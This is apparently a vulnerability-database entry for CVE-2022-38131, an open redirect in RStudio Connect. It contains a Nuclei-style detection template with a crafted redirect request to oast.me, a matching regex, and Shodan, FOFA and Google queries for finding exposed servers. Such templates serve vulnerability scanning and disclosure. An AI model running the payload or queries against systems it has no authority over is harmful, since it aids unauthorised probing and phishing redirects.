CVE-2022-38131: RStudio Connect - Open Redirect

日期: 2025-08-01 | 影响软件: RStudio Connect | POC: 已公开

漏洞描述

RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.

PoC代码[已公开]

id: CVE-2022-38131

info:
  name: RStudio Connect - Open Redirect
  author: xxcdd
  severity: medium
  description: |
    RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
  impact: |
    An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
  remediation: |
    This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
  reference:
    - https://tenable.com/security/research/tra-2022-30
    - https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-38131
    cwe-id: CWE-601
    epss-score: 0.03774
    epss-percentile: 0.87621
    cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rstudio
    product: connect
    shodan-query:
      - "http.favicon.hash:217119619"
      - http.title:"openvpn connect"
    fofa-query:
      - "app=\"RStudio-Connect\""
      - title="openvpn connect"
    google-query: intitle:"openvpn connect"
  tags: tenable,cve,cve2022,redirect,rstudio

http:
  - raw:
      - |
        GET //%5coast.me HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'

      - type: status
        status:
          - 307
# digest: 490a00463044022001bcf5a6bc1175768d9d66df903dde79c0ebb930ab493a19f7d7eed69b6ad1a502202bae5b788c20f33c3e7115ebd19661d01b061f294af3c82941921823a2eac6dc:922c64590222798bb761d5b6d8e72950